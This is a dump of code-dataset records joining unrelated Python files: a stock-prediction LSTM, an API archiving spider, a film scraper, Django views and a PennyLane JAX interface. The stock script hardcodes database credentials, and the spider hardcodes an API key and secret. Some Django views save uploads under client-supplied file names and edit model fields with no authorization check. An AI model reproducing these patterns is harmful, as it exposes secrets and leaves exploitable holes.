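snippet = "now $1,234 down from $1,421 on EVA Air"
prices = [m.group() for m in dollar.finditer(snippet)]
print(prices)  # ['$1,234', '$1,421']

# RFC-2822 date as found in a Gmail 'Date' header
date = datetime.strptime("Tue, 05 May 2020 09:54:00 +0000",
                         "%a, %d %b %Y %H:%M:%S %z").strftime("%m/%d/%y")
print(date)  # 05/05/20
```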
BaseWithoutCreateProjectAuthorTestCase\n\n\nclass ProjectCreateTestCase(BaseWithoutCreateProjectAuthorTestCase):\n\n def test_create_project_check_auth_fail(self):\n\n with self.app.test_client() as test_client:\n response = test_client.post('/projects/')\n assert response.status_code == 401\n\n def test_create_project_check_auth_success(self):\n \n with self.app.test_client() as test_client:\n\n sign_in(test_client)\n project_data = {\n 'title': random_string(),\n 'description': random_string(),\n 'website': f\"{random_string()}.com\",\n }\n\n response = test_client.post('/projects/', data=project_data)\n\n assert response.status_code == 201\n","sub_path":"tests/functional/project/test_create_project.py","file_name":"test_create_project.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"503368881","text":"\r\n# coding: utf-8\r\n\r\n# In[3]:\r\n\r\n#\r\n# LSTM모델을 이용해서 주가예측\r\n#\r\nimport os\r\nimport settings\r\nimport pandas as pd # 라이브러리\r\nimport numpy as np # 라이브러리\r\nfrom keras.models import Sequential # 딥러닝을 구동하는 데 필요한 케라스 함수\r\nfrom keras.layers import Dense # 딥러닝을 구동하는 데 필요한 케라스 함수\r\nfrom keras.layers import LSTM # 딥러닝을 구동하는 데 필요한 케라스 함수\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nimport matplotlib.pyplot as plt\r\nimport math\r\nfrom sklearn.metrics import mean_squared_error\r\nimport pymysql # 파이썬에서 mysql연동시켜주는 라이브러리\r\n\r\n\r\n# 데이터셋 생성 함수\r\nlook_back = 1\r\ndef create_dataset(dataset, look_back=1):\r\n dataX, dataY = [], []\r\n for i in range(len(dataset)-look_back-1):\r\n a = dataset[i:(i + look_back)]\r\n dataX.append(a)\r\n dataY.append(dataset[i + look_back])\r\n return np.array(dataX), np.array(dataY)\r\n \r\n#\r\n# 저장되어있는 주식데이터 불러오기\r\n#\r\nsydtpath = os.path.join(settings.BASE_DIR, 'chart_data/%s' % (settings.get_today_str()))\r\nstock_code = \"asiana\"\r\nfullpath = sydtpath + os.path.sep + stock_code + '.csv'\r\npandf = pd.read_csv(fullpath, index_col=\"Date\")\r\n\r\n# 데이터 전처리\r\nnparr = pandf['Close'].values[1:] # 맨처음 'Close'데이터부터 차례대로 nparr에 저장\r\nprint(nparr)\r\nnparr.astype('float32') # float형으로 변환\r\nprint(nparr)\r\nnparr = nparr.reshape(-1,1)\r\nprint(nparr)\r\n \r\n# 정규화 (0~1사이의 값으로 바꿔준다)\r\nscaler = MinMaxScaler(feature_range=(0, 1))\r\nnptf = scaler.fit_transform(nparr)\r\n \r\n# 학습용, 테스트용 데이터로 나누기 (90%를 학습용 데이터, 10%를 테스트용 데이터)\r\ntrain_size = int(len(nptf) * 0.9)\r\ntest_size = len(nptf) - train_size\r\ntrain, test = nptf[0:train_size], nptf[train_size:len(nptf)]\r\nprint(len(train), len(test))\r\n \r\n# 학습을 위한 데이터셋 생성하기 (학습용, 테스트용으로 구분)\r\ntrainX, trainY = create_dataset(train, look_back)\r\ntestX, testY = create_dataset(test, look_back)\r\n \r\n# RNN모델은 3차원 데이터\r\n# trainX, testX값을 [samples, time steps, features] 형태로 reshape\r\ntrainX = np.reshape(trainX, (trainX.shape[0], 1, trainX.shape[1]))\r\ntestX = np.reshape(testX, (testX.shape[0], 1, testX.shape[1]))\r\n \r\n# LSTM모델\r\nmodel = Sequential() # 딥러닝 구조, 층을 설정\r\nmodel.add(LSTM(20, input_shape=(1, 1))) # (timestep, feature) # 층이 추가됨 (add) # 입력층, 첫번째 은닉층 \r\nmodel.add(Dense(1)) # 출력층 (하나)\r\n# 모델을 컴파일 (컴퓨터가 알아들을 수 있도록) # 오차함수, 최적화 방법\r\nmodel.compile(loss='mean_squared_error', optimizer='adam', metrics=['accuracy']) # metrics : 모델 수행 결과를 나타내게 설정 (과적합 문제 방지)\r\nmodel.fit(trainX, trainY, epochs=1000, batch_size=50, verbose=2) # 모델을 실제로 수행 # batch_size : 전체 데이터를 10개씩 사용\r\n # verbose(로깅) 2 : epoch당 나오게\r\n\r\n# 예측값 평가하기 (얼마나 정확한지)\r\ntestPredict = model.predict(testX)\r\ntestPredict = 
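test_create_project.py above drives the application through Flask's test client: an unauthenticated POST should return 401, and a signed-in POST with form data should return 201. The test-client mechanics in a self-contained sketch (a minimal app with a hypothetical route, not the project's real one):

```python
from flask import Flask, request

app = Flask(__name__)

@app.route("/projects/", methods=["POST"])
def create_project():
    # toy handler: reject missing title, otherwise report created
    if not request.form.get("title"):
        return "", 400
    return "", 201

with app.test_client() as client:
    resp = client.post("/projects/", data={"title": "demo"})
    assert resp.status_code == 201
```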
scaler.inverse_transform(testPredict) # testPredict : 예측 값\r\ntestY = scaler.inverse_transform(testY) # testY : 실제 값\r\ntestScore = math.sqrt(mean_squared_error(testY, testPredict)) # mean_squared_error : 평균 제곱근 오차\r\nprint('Train Score: %.2f RMSE' % testScore) # 예측 값과 실제 값 차이 출력\r\n \r\n# 예측 데이터 출력\r\nlastX = nptf[-1]\r\nlastX = np.reshape(lastX, (1, 1, 1))\r\nlastY = model.predict(lastX)\r\npredict = scaler.inverse_transform(lastY) # 정규화 시킨 값을 역변환\r\nprint('Predict the Close value of final day: %d' % predict) # 데이터 입력 마지막 다음날 종가 예측\r\n \r\n# 차트출력, 저장\r\nplt.plot(testPredict)\r\nplt.plot(testY)\r\n\r\nplt.title('asiana predict graph')\r\n\r\nplt.savefig(\"./chart_picture/asiana.png\",dpi=300)\r\n#plt.show() 자동실행하면 오류\r\n\r\n# 사진 데이터 binary��식으로 바꿔주는 함수\r\ndef convertToBinaryData(filename):\r\n #Convert digital data to binary format\r\n with open(filename, 'rb') as file:\r\n binaryData = file.read()\r\n return binaryData\r\n\r\n\r\n# \r\n# DB테이블 값 삽입 (INSERT)\r\n#\r\n# MySQL Connection 연결\r\nconnection = pymysql.connect(host='222.122.86.187', port=3306, user='geniuses777', password='stock7840',\r\n db='geniuses777', charset='utf8')\r\ntry:\r\n with connection.cursor() as cursor:\r\n sql = 'INSERT INTO stock_hye (company_name, stock_price, image) VALUES (%s, %s, %s) ON DUPLICATE KEY UPDATE stock_price = VALUES(stock_price), image = VALUES(image)'\r\n image = convertToBinaryData(\"C:\\source\\SPF\\chart_picture\\\\asiana.png\")\r\n cursor.execute(sql, ('아시아나항공', int(predict), image)) # 넣으려는 값\r\n connection.commit()\r\n \r\nfinally:\r\n connection.close()\r\n\r\n\r\n# In[ ]:\r\n\r\n\r\n\r\n","sub_path":"정혜수/SPF/run.py/asiana.py","file_name":"asiana.py","file_ext":"py","file_size_in_byte":5336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"376891136","text":"#!/usr/bin/python\n\"\"\"Example of archiving an MP site to the filesystem.\n\nThis script will spider a Metropublisher instance, download as much as it can\nand write it out to the filesystem.\n\nThis example probably does not work on Windows, help appreciated...\n\"\"\"\n\nimport os\nimport sys\nimport datetime\nimport logging\nimport tempfile\nfrom urlparse import urlparse\nfrom pprint import pprint\nimport json\n\nimport van_api\n\nAPI_KEY = 'mxvsm129bm7RgcGRYedzLersZXGQSwQjMiyilovZL7A'\nAPI_SECRET = 'hSBADtfwcEnxeatj'\nSTART_URL = '/1'\n\ndef mkdirs(path):\n try:\n os.makedirs(path)\n except OSError:\n pass\n\nclass Spider:\n\n def __init__(self, api, start_url, outdir):\n self.api = api\n self.start_url = start_url\n self.outdir = outdir\n\n def run(self):\n todo_urls = set([self.start_url])\n seen_urls = set([])\n media_todo_urls = set([])\n media_seen_urls = set([])\n while todo_urls:\n self.spider_one(seen_urls, todo_urls, media_todo_urls)\n while media_todo_urls:\n self.spider_media(media_seen_urls, media_todo_urls)\n\n def get_outfile(self, url):\n url = urlparse(url)\n path = url.path[1:] # remove leading /\n outfile = os.path.join(self.outdir, path) #not working on windows??\n mkdirs(os.path.dirname(outfile))\n return outfile\n\n def http_handler(self, request, resp):\n headers = resp.getheaders()\n for h, v in headers:\n if h.lower() == 'content-type':\n content_type = v.split(';')[0].strip()\n break\n if content_type == 'application/json':\n outfile = self.get_outfile(request['url'])\n body = resp.read()\n outfile = '%s.json' % outfile\n with open(outfile, 'wb') as f:\n f.write(body)\n else:\n # expects a file download url like: /{iid}/files/{uuid}/download/...\n 
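In asiana.py above, predictions are mapped back to price scale with `scaler.inverse_transform` before RMSE is computed — comparing scaled predictions against raw prices is a common mistake. The round-trip in miniature, with synthetic numbers:

```python
import numpy as np
from sklearn.preprocessing import MinMaxScaler
from sklearn.metrics import mean_squared_error

prices = np.array([[3000.0], [3200.0], [3100.0], [3500.0]])
scaler = MinMaxScaler(feature_range=(0, 1))
scaled = scaler.fit_transform(prices)

pred_scaled = scaled + 0.02               # stand-in for model output
pred = scaler.inverse_transform(pred_scaled)
rmse = np.sqrt(mean_squared_error(prices, pred))
print(f"RMSE: {rmse:.2f}")                # both sides in original price units
```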
download_url = request['url']\n download_url = download_url.split('/download')[0]\n outfile = self.get_outfile(download_url)\n outfile = '%s.data' % outfile\n body = None\n with open(outfile, 'wb') as f:\n van_api.write_body_to_file(resp, f)\n return dict(\n status=resp.status,\n headers=headers,\n body=body,\n reason=resp.reason)\n\n def http_handler_media(self, request, resp):\n headers = resp.getheaders()\n for h, v in headers:\n if h.lower() == 'content-type':\n content_type = v.split(';')[0].strip()\n break\n if content_type == 'application/json':\n body = resp.read()\n body_json = json.loads(body)\n if body_json.get('items'):\n outfile = self.get_outfile(request['url'])\n outfile = '%s.json' % outfile\n with open(outfile, 'wb') as f:\n f.write(json.dumps(body_json['items']))\n return dict(\n status=resp.status,\n headers=headers,\n body=body,\n reason=resp.reason)\n\n def spider_one(self, seen_urls, todo_urls, media_todo_urls):\n url = todo_urls.pop()\n logging.info('Spidering: %s' % url)\n assert url not in seen_urls\n seen_urls.add(url)\n go_urls = set([])\n resp = self.api.request('GET', url, http_handler=self.http_handler)\n if resp is not None:\n # look for urls in the response\n if 'download_url' in resp:\n go_urls.add(resp['download_url'])\n if 'items' in resp:\n if 'next' in resp:\n next_url = '%s?%s' % (url.split('?')[0], resp['next'])\n go_urls.add(next_url)\n for item in resp['items']:\n if isinstance(item, list):\n url = item[0]\n else:\n url = item['url']\n if '%s/content/' % self.start_url in url:\n media_todo_urls.add('%s/media' % url)\n go_urls.add(url)\n todo_urls.update(go_urls - seen_urls)\n\n def spider_media(self, seen_urls, todo_urls):\n url = todo_urls.pop()\n logging.info('Spidering media: %s' % url)\n assert url not in seen_urls\n seen_urls.add(url)\n go_urls = set([])\n resp = self.api.request('GET', url, http_handler=self.http_handler_media)\n todo_urls.update(go_urls - seen_urls)\n\n\ndef connect(api_key, api_secret, endpoint='api.metropublisher.com'):\n logging.info(\"Connection to the API\")\n credentials = van_api.ClientCredentialsGrant(api_key, api_secret)\n return van_api.API(endpoint, credentials)\n\ndef get_outdir():\n outdir = 'MP-export-%s' % datetime.datetime.now().isoformat()\n return os.path.join(os.curdir, outdir)\n\ndef main():\n logging.basicConfig(level=logging.INFO, format='%(levelname)s:%(message)s')\n logging.info('Connecting to API')\n api = connect(API_KEY, API_SECRET)\n outdir = get_outdir()\n logging.info('Saving result to %s' % outdir)\n s = Spider(api, START_URL, outdir)\n s.run()\n\nif __name__ == '__main__':\n main()\n","sub_path":"examples/archive_to_filesystem.py","file_name":"archive_to_filesystem.py","file_ext":"py","file_size_in_byte":5247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"596520364","text":"import requests\nfrom bs4 import BeautifulSoup\nimport time\nimport argparse\nimport re\n\n\nTIMEOUT = 11 # seconds\nSHOWS_LIMIT = 200\n\n\ndef check_positive(value):\n ivalue = int(value)\n if ivalue <= 0:\n raise argparse.ArgumentTypeError(\"{} is an invalid positive int value\".format(value))\n return ivalue\n\n\ndef get_film_list_from_afisha_page():\n response = requests.get('http://www.afisha.ru/msk/schedule_cinema/')\n films_soup = BeautifulSoup(response.text, 'html5lib')\n films_list = films_soup.find_all(\"div\", {\"class\": \"m-disp-table\"})\n return [x.a.text.strip() for x in films_list]\n\n\ndef fetch_movie_info(response_text):\n film_soup = 
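The `Spider` in archive_to_filesystem.py above is a classic worklist traversal: pop a URL, mark it seen, and enqueue only unseen discoveries via `todo_urls.update(go_urls - seen_urls)` — the set subtraction is what prevents revisits. Stripped to its core (illustrative sketch):

```python
def crawl(start, get_links):
    """Worklist traversal: get_links(url) returns URLs discovered at url."""
    todo, seen = {start}, set()
    while todo:
        url = todo.pop()
        seen.add(url)
        todo.update(set(get_links(url)) - seen)  # enqueue only unseen URLs
    return seen

links = {"/1": ["/1/a", "/1/b"], "/1/a": ["/1"], "/1/b": []}
print(sorted(crawl("/1", lambda u: links.get(u, []))))
# ['/1', '/1/a', '/1/b']
```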
BeautifulSoup(response_text, 'html5lib')\n movie_info = {}\n try:\n movie_info['rating'] = float(film_soup.find(\"span\", {\"class\": \"rating_ball\"}).text)\n except AttributeError:\n movie_info['rating'] = 0\n try:\n shows_str = film_soup.find(\"div\", {\"class\": \"shows\"}).a.text\n movie_info['shows'] = re.sub(\"[^0-9]\", \"\", shows_str)\n except AttributeError:\n movie_info['shows'] = 0\n return movie_info\n\n\ndef output_movies_to_console(movies, quantity):\n for number, movie in enumerate(sort_movie_list_by_rating(movies), start=1,):\n print('{} \"{}\" has rating {} and {} shows'.format(number, movie['title'], movie['rating'], movie['shows']))\n if number == quantity:\n break\n\n\ndef sort_movie_list_by_rating(movies):\n sorted_by_rating_movie_list = sorted(movies, key=lambda k: k['rating'], reverse=True)\n return [x for x in sorted_by_rating_movie_list if int(x['shows']) > SHOWS_LIMIT]\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Movies quantity')\n parser.add_argument('movies_quantity', type=check_positive, help='How many movies to show')\n args = parser.parse_args()\n\n movies_quantity = args.movies_quantity\n movies_info = []\n movies_titles_list = get_film_list_from_afisha_page()\n for number, movie_title in enumerate(movies_titles_list, start=1):\n payload = {'first': 'yes', 'kp_query': movie_title}\n headers = {\n 'Accept': '*/*',\n 'Accept-Encoding': 'UTF-8',\n 'Accept-Language': 'en-US,en;q=0.8,ru;q=0.6',\n 'Content-Type': 'text/html;charset=UTF-8',\n 'User-Agent': 'Agent:Mozilla/5.0 (Windows NT 6.1; WOW64))'\n }\n response = requests.get('https://www.kinopoisk.ru/index.php', headers=headers, params=payload)\n if response.status_code == 200:\n movie_dict = fetch_movie_info(response.text)\n movie_dict['title'] = movie_title\n movies_info.append(movie_dict)\n print(\"{}/{} movie parsed\".format(number, len(movies_titles_list)))\n else:\n print(\"Error parsing {}/{} movie\".format(number, len(movies_titles_list)))\n time.sleep(TIMEOUT)\n output_movies_to_console(movies_info, movies_quantity)\n","sub_path":"cinemas.py","file_name":"cinemas.py","file_ext":"py","file_size_in_byte":2933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"585904574","text":"#!/usr/bin/env python3\n\"\"\"Add two numbers while checking for valid characters being passed\"\"\"\n\ndef addition(num1, num2):\n \"\"\"Add two numbers with exception handling\"\"\"\n try:\n return int(num1) + int(num2)\n except ValueError:\n return \"Please input numbers only.\"\n\nwhile True:\n number1 = input(\"Input a number to add (q to quit) \")\n if number1 == 'q':\n break\n number2 = input(\"Input another number to add (q to quit) \")\n if number2 == 'q':\n break\n print(addition(number1, number2))\n","sub_path":"chapter_10/addition.py","file_name":"addition.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"644024012","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.shortcuts import render, get_object_or_404 ,render_to_response\nfrom .models import Cold_Dishes, First_Courses, Salad, Hot_Appetizers, Order\nfrom django.contrib import auth\nfrom .forms import Restaurants_Form\nfrom mysite import settings\nimport os , json\n\n# Create your views here.\n\ndef rest(request):\n result = \"Successful add!\"\n if request.method == \"POST\" and request.POST['name'] and request.POST['weight'] and 
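`sort_movie_list_by_rating` in cinemas.py above pairs `sorted` with a key function, then filters by show count. The same two-step idiom in isolation (SHOWS_LIMIT is the script's constant; the data is made up):

```python
SHOWS_LIMIT = 200

movies = [
    {"title": "A", "rating": 7.1, "shows": "350"},
    {"title": "B", "rating": 8.4, "shows": "120"},  # filtered out: too few shows
    {"title": "C", "rating": 6.9, "shows": "500"},
]

by_rating = sorted(movies, key=lambda m: m["rating"], reverse=True)
popular = [m for m in by_rating if int(m["shows"]) > SHOWS_LIMIT]
print([m["title"] for m in popular])  # ['A', 'C']
```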
request.POST['price'] and request.POST['consist'] and request.FILES['image']:\n form = Restaurants_Form(request.POST, request.FILES)\n if form.is_valid():\n upload_file(request.FILES['image'])\n Cold_Dishes.objects.create(name=request.POST['name'],\n weight=request.POST['weight'],\n price=request.POST['price'],\n consist=request.POST['consist'],\n image=request.FILES['image'])\n return render(request,\"main.html\", {'result': result, 'user' : request.user})\n else:\n if request.method == \"GET\":\n return render(request,\"add.html\", {'dishes': Cold_Dishes.objects.all(), 'user' : request.user})\n\n\ndef upload_file(f):\n with open(os.path.join(settings.MEDIA_ROOT,f.name),'wb+') as destination:\n for chunk in f.chunks():\n destination.write(chunk)\n\ndef cold_dishes(request, Cold_Dishes_id):\n return HttpResponse(\"You're looking at question %s.\" % Cold_Dishes_id)\n\ndef ColdDishes_id(request,id):\n if request.method == \"GET\":\n return render(request,\"Cold_Dishes.html\" , {'dishes': [Cold_Dishes.objects.get(id = int(id))], 'user' : request.user})\n\n\ndef Cold_dishes(request):\n args = {}\n if request.method == 'GET':\n return render(request, \"Cold_Dishes.html\", {'dishes': Cold_Dishes.objects.all(), 'user': request.user})\n\ndef First_courses(request):\n if request.method == 'GET':\n return render(request, \"First_courses.html\", {'first_course': First_Courses.objects.all(), 'user': request.user})\n\ndef Hot_appetizers(request):\n if request.method == 'GET':\n return render(request, \"Hot_Appetizers.html\", {'hot': Hot_Appetizers.objects.all(), 'user': request.user})\n\n\ndef Salad_view(request):\n args = {}\n if request.method == 'GET':\n return render(request, \"Salad.html\", {'salad': Salad.objects.all(), 'user': request.user})\n\ndef Main_view(request):\n if request.method == 'GET':\n return render(request, \"Salad.html\", {'salad': Salad.objects.all(), 'user': request.user})\n #return HttpResponse(request , \"You're looking at question.\" ,{})\n\n\n\ndef hot_view(request):\n return render(request, \"Hot_Appetizers.html\" , {'hot': Hot_Appetizers.objects.all(), 'user': request.user})\n\ndef Menu(request):\n if request.method == 'GET':\n return render(request, \"menu.html\", {'user': request.user})\n #return render_to_response(\"menu.html\", {'username':auth.get_user(request).username}, args)\n\n\ndef search(request):\n rests = Cold_Dishes.objects.none()\n flag = True\n print(rests)\n if 'search' in request.GET:\n search = request.GET['search'].split()\n print(search)\n for val in search:\n if flag:\n newrests = Cold_Dishes.objects.filter(name__icontains=val)\n print(newrests)\n if newrests:\n rests = newrests\n else:\n continue\n flag = False\n else:\n newrests = Cold_Dishes.objects.filter(name__icontains=val)\n if newrests:\n rests = newrests\n\n return HttpResponse(json.dumps([i.dict() for i in rests]), content_type=\"application/javascript\")\n\ndef DelCold_Dishes(request,id):\n result = \"Successful del\"\n if request.method == \"POST\":\n Cold_Dishes.objects.get(id=int(id)).delete()\n return render(request,\"main.html\", {'result': result, 'user' : request.user})\n\n\ndef Orders(request):\n result = \"Ваш заказ прийнятий, найближчим часом з вами звяжеться наш менеджер\"\n if request.method == \"POST\" and request.POST['name'] and request.POST['surname'] and request.POST['phone'] and request.POST['email'] and request.POST['number'] and request.POST['date']:\n Order.objects.create(name=request.POST['name'],\n surname=request.POST['surname'],\n phone=request.POST['phone'],\n 
email=request.POST['email'],\n number=request.POST['number'],\n date=request.POST['date'])\n return render(request, \"main.html\", {'result': result, 'user': request.user})\n else:\n if request.method == \"GET\":\n return render(request, \"order.html\", {'orders': Order.objects.all(), 'user': request.user})\n\n\ndef Orders_get(request):\n args = {}\n if request.method == 'GET':\n return render(request, \"listOfOrders.html\", {'orders': Order.objects.all(), 'user': request.user})\n\ndef Contact(request):\n if request.method == 'GET':\n return render(request,\"Contacts.html\",{'user':request.user})","sub_path":"courses/mysite/restaurant/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"158289122","text":"import json\nfrom django.http import HttpResponse\nfrom django.shortcuts import render\nfrom django.db.models import get_model, CharField, IntegerField, DateField\nfrom django import forms\nfrom django.core.serializers.json import DjangoJSONEncoder\nfrom models import all_models, JSON_FIELDS_MAP\n\nVALIDATION_FORM_MAP = {IntegerField: forms.IntegerField, CharField: forms.CharField, DateField: forms.DateField, }\n\n\ndef create_adding_form(m):\n fields = {}\n for field in m._meta.fields:\n if field.__class__ == DateField: fields[field.name] = forms.TextInput(attrs={'class': 'datepicker'})\n if field.__class__ == IntegerField: fields[field.name] = forms.TextInput(attrs={'pattern': '\\d+'})\n\n class AddingForm(forms.ModelForm):\n model = forms.CharField(widget=forms.HiddenInput, initial=m.__name__)\n class Meta:\n model = m\n widgets = fields\n return AddingForm\n\n\ndef home(request):\n if request.method == 'POST' and 'model' in request.POST:\n model = get_model(__name__.split('.')[0], request.POST['model'])\n if model in all_models():\n form = create_adding_form(model)(request.POST)\n if form.is_valid():\n form.save()\n return render(request, 'index.html', {'models': [{'name': m.__name__, 'verbose_name': m._meta.verbose_name,\n 'form': create_adding_form(m)} for m in all_models()]})\n\n\ndef open_model(request):\n if request.is_ajax() and request.method == 'GET':\n model = get_model(__name__.split('.')[0], request.GET['name'])\n fields = model._meta.fields\n\n header = [field.verbose_name for field in fields]\n items = []\n for item in model.objects.all():\n items.append([{'name': field.name,\n 'type': JSON_FIELDS_MAP[field.__class__],\n 'value': getattr(item, field.name)} for field in fields])\n return HttpResponse(json.dumps({'header': header, 'items': items}, cls=DjangoJSONEncoder),\n mimetype=\"application/json\")\n\n\nclass ValidationForm(forms.Form):\n def __init__(self, model_field_class, *args, **kwargs):\n super(ValidationForm, self).__init__(*args, **kwargs)\n self.fields['field'] = VALIDATION_FORM_MAP[model_field_class]()\n\n\ndef edit_field(request):\n result = False\n if request.is_ajax() and request.method == 'POST':\n model = get_model(__name__.split('.')[0], request.POST['model'])\n object_id = int(request.POST['object_id'])\n field_name = request.POST['name']\n value = request.POST['value']\n form = ValidationForm(model._meta.get_field(field_name).__class__, {'field': value})\n if form.is_valid():\n result = model.objects.filter(pk=object_id).update(**{field_name: value})\n return HttpResponse(json.dumps(result), 
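The `search` view in the restaurant app above accumulates `icontains` matches with a manual flag variable; Django's `Q` objects express a multi-term OR search more directly. A hedged alternative sketch (not the app's code):

```python
from django.db.models import Q

def search_dishes(model_cls, terms):
    """OR together icontains filters, one per search term."""
    query = Q()
    for term in terms:
        query |= Q(name__icontains=term)
    # with no terms, Q() is neutral and this returns all rows
    return model_cls.objects.filter(query)

# usage: search_dishes(Cold_Dishes, request.GET["search"].split())
```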
mimetype=\"application/json\")\n","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"37413458","text":"# Copyright 2018-2021 Xanadu Quantum Technologies Inc.\r\n\r\n# Licensed under the Apache License, Version 2.0 (the \"License\");\r\n# you may not use this file except in compliance with the License.\r\n# You may obtain a copy of the License at\r\n\r\n# http://www.apache.org/licenses/LICENSE-2.0\r\n\r\n# Unless required by applicable law or agreed to in writing, software\r\n# distributed under the License is distributed on an \"AS IS\" BASIS,\r\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n# See the License for the specific language governing permissions and\r\n# limitations under the License.\r\n\"\"\"\r\nThis module contains the mixin interface class for creating differentiable quantum tapes with\r\nJAX.\r\n\"\"\"\r\nfrom functools import partial\r\nimport jax\r\nimport jax.experimental.host_callback as host_callback\r\nimport jax.numpy as jnp\r\nfrom pennylane.queuing import AnnotatedQueue\r\nfrom pennylane.operation import Variance, Expectation\r\n\r\n\r\nclass JAXInterface(AnnotatedQueue):\r\n \"\"\"Mixin class for applying an JAX interface to a :class:`~.JacobianTape`.\r\n\r\n JAX-compatible quantum tape classes can be created via subclassing:\r\n\r\n .. code-block:: python\r\n\r\n class MyJAXQuantumTape(JAXInterface, JacobianTape):\r\n\r\n Alternatively, the JAX interface can be dynamically applied to existing\r\n quantum tapes via the :meth:`~.apply` class method. This modifies the\r\n tape **in place**.\r\n\r\n Once created, the JAX interface can be used to perform quantum-classical\r\n differentiable programming.\r\n\r\n .. note::\r\n\r\n If using a device that supports native JAX computation and backpropagation, such as\r\n :class:`~.DefaultQubitJAX`, the JAX interface **does not need to be applied**. It\r\n is only applied to tapes executed on non-JAX compatible devices.\r\n\r\n **Example**\r\n\r\n Once a JAX quantum tape has been created, it can be differentiated using JAX:\r\n\r\n .. 
code-block:: python\r\n\r\n tape = JAXInterface.apply(JacobianTape())\r\n\r\n with tape:\r\n qml.Rot(0, 0, 0, wires=0)\r\n expval(qml.PauliX(0))\r\n\r\n def cost_fn(x, y, z, device):\r\n tape.set_parameters([x, y ** 2, y * np.sin(z)], trainable_only=False)\r\n return tape.execute(device=device)\r\n\r\n >>> x = jnp.array(0.1, requires_grad=False)\r\n >>> y = jnp.array(0.2, requires_grad=True)\r\n >>> z = jnp.array(0.3, requires_grad=True)\r\n >>> dev = qml.device(\"default.qubit\", wires=2)\r\n >>> cost_fn(x, y, z, device=dev)\r\n DeviceArray([ 0.03991951], dtype=float32)\r\n >>> jac_fn = jax.vjp(cost_fn)\r\n >>> jac_fn(x, y, z, device=dev)\r\n DeviceArray([[ 0.39828408, -0.00045133]], dtype=float32)\r\n \"\"\"\r\n\r\n # pylint: disable=attribute-defined-outside-init\r\n dtype = jnp.float64\r\n\r\n @property\r\n def interface(self): # pylint: disable=missing-function-docstring\r\n return \"jax\"\r\n\r\n def _execute(self, params, device):\r\n # TODO (chase): Add support for more than 1 measured observable.\r\n if len(self.observables) != 1:\r\n raise ValueError(\r\n \"The JAX interface currently only supports quantum nodes with a single return type.\"\r\n )\r\n return_type = self.observables[0].return_type\r\n if return_type is not Variance and return_type is not Expectation:\r\n raise ValueError(\r\n f\"Only Variance and Expectation returns are supported for the JAX interface, given {return_type}.\"\r\n )\r\n\r\n @jax.custom_vjp\r\n def wrapped_exec(params):\r\n exec_fn = partial(self.execute_device, device=device)\r\n return host_callback.call(\r\n exec_fn,\r\n params,\r\n result_shape=jax.ShapeDtypeStruct((1,), JAXInterface.dtype),\r\n )\r\n\r\n def wrapped_exec_fwd(params):\r\n return wrapped_exec(params), params\r\n\r\n def wrapped_exec_bwd(params, g):\r\n def jacobian(params):\r\n tape = self.copy()\r\n tape.set_parameters(params)\r\n return tape.jacobian(device, params=params, **tape.jacobian_options)\r\n\r\n val = g.reshape((-1,)) * host_callback.call(\r\n jacobian,\r\n params,\r\n result_shape=jax.ShapeDtypeStruct((1, len(params)), JAXInterface.dtype),\r\n )\r\n return (list(val.reshape((-1,))),) # Comma is on purpose.\r\n\r\n wrapped_exec.defvjp(wrapped_exec_fwd, wrapped_exec_bwd)\r\n return wrapped_exec(params)\r\n\r\n @classmethod\r\n def apply(cls, tape):\r\n \"\"\"Apply the JAX interface to an existing tape in-place.\r\n\r\n Args:\r\n tape (.JacobianTape): a quantum tape to apply the JAX interface to\r\n\r\n **Example**\r\n\r\n >>> with JacobianTape() as tape:\r\n ... qml.RX(0.5, wires=0)\r\n ... 
expval(qml.PauliZ(0))\r\n >>> JAXInterface.apply(tape)\r\n >>> tape\r\n , params=1>\r\n \"\"\"\r\n tape_class = getattr(tape, \"__bare__\", tape.__class__)\r\n tape.__bare__ = tape_class\r\n tape.__class__ = type(\"JAXQuantumTape\", (cls, tape_class), {})\r\n return tape\r\n","sub_path":"pennylane/interfaces/jax.py","file_name":"jax.py","file_ext":"py","file_size_in_byte":5191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"231371062","text":"import logging\nimport os\nimport pdb\n\nfrom tqdm import tqdm \nimport numpy as np\nimport torch\nfrom tensorboardX import SummaryWriter\nfrom torch.optim.lr_scheduler import ReduceLROnPlateau\nfrom torch_geometric.data import Data\n\nfrom utils.helper import RunningAverage, save_checkpoint, load_checkpoint, get_logger, get_batch_size\nfrom utils.visualize import VisdomLinePlotter\n\nclass Trainer:\n \"\"\"Network trainer\n\n Args:\n model: network model to be trained\n optimizer (nn.optim.Optimizer): optimizer used for training\n lr_scheduler (torch.optim.lr_scheduler._LRScheduler): learning rate scheduler\n WARN: bear in mind that lr_scheduler.step() is invoked after every validation step\n (i.e. validate_after_iters) not after every epoch. So e.g. if one uses StepLR with step_size=30\n the learning rate will be adjusted after every 30 * validate_after_iters iterations.\n loss_criterion (callable): loss function\n eval_criterion (callable): used to compute training/validation metricc\n saving the best checkpoint is based on the result of this function on the validation set\n device (torch.device): device to train on\n loaders (dict): 'train' and 'val' loaders\n checkpoint_dir (string): dir for saving checkpoints and tensorboard logs\n max_num_epochs (int): maximum number of epochs\n max_num_iterations (int): maximum number of iterations\n validate_after_iters (int): validate after that many iterations\n log_after_iters (int): number of iterations before logging to tensorboard\n validate_iters (int): number of validation iterations, if None validate\n on the whole validation set\n eval_score_higher_is_better (bool): if True higher eval scores are considered better\n 